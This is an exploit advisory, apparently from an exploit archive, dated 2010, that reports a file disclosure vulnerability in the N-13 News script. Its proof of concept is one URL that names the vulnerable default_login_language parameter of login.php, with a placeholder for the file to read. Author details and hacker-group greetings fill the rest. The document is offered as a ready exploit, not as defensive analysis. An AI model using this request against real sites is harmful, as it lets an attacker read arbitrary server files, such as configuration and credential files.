id: 11446
date: 03/26/2010
title: N-13 News File Disclosure Vulnerability
author: JiKo
cves: 

=======================================
N-13 News File Disclosure Vulnerability 
=======================================

|=-----------------------------------------------------=|
  |=-------------=[  JIKO |No-exploit.Com|  ]=-----------=|
  |=-----------------------------------------------------=|
[~]-----------|00|
NAme    :JIKO (JAWAD)
Home    :No-exploit.Com
Mail    : !x!
[~]-----------|01|
    -{Script}
    name :N-13 News
    link :http://network-13.com/
 
[~]-----------|02|
    -{3xpl01t}
    http://no-exploit.com/modules/login.php?default_login_language={FILE}
[~]-----------|03|
    -{Greetz}
    Cyber-Zone,HxH,DannY.IraQi ,Hussin X,ZaIdOoHxHaCkEr ,Stack,HiSoKa,The SadHacker,SkuLL-HacKeR ,Dr.NaNo
    |No-Exploit.com Members
------------------------------------- 



#  0day.today [2023-03-23]  #